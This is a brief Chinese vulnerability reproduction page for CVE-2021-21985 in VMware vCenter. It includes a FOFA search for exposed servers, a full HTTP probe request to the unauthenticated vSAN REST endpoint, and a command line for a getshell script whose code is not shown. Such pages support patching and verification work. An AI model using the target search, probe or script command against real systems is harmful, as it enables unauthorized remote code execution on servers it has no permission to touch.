登录 白背景

VMware vCenter 存在远程代码执行漏洞(CVE-2021-21985)

一、漏洞简介

VMware vCenter Server是美国威睿(Vmware)公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台,可自动实施和交付虚拟基础架构。默认启用的 Virtual SAN Health Check 插件(vsan-h5-client.zip)/rest/*接口存在未授权访问,可利用不安全的反射调用实现 RCE。

二、影响版本

  • VMware vCenter

三、资产测绘

  • fofatitle="ID_VC_Welcome"

image.png

四、漏洞复现

POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: 
User-Agent: python-requests/2.30.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 88

{"methodInput": [{"type": "ClusterComputeResource", "value": null, "serverGuid": null}]}

发送请求包,出现isDisconnected:false即存在漏洞image.png
jiaoben.py
使用脚本直接getshell

python3 jiaoben.py https://xxx.xxx.xxx.xx/ whoami

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/wfgb54s7m9vgf0sx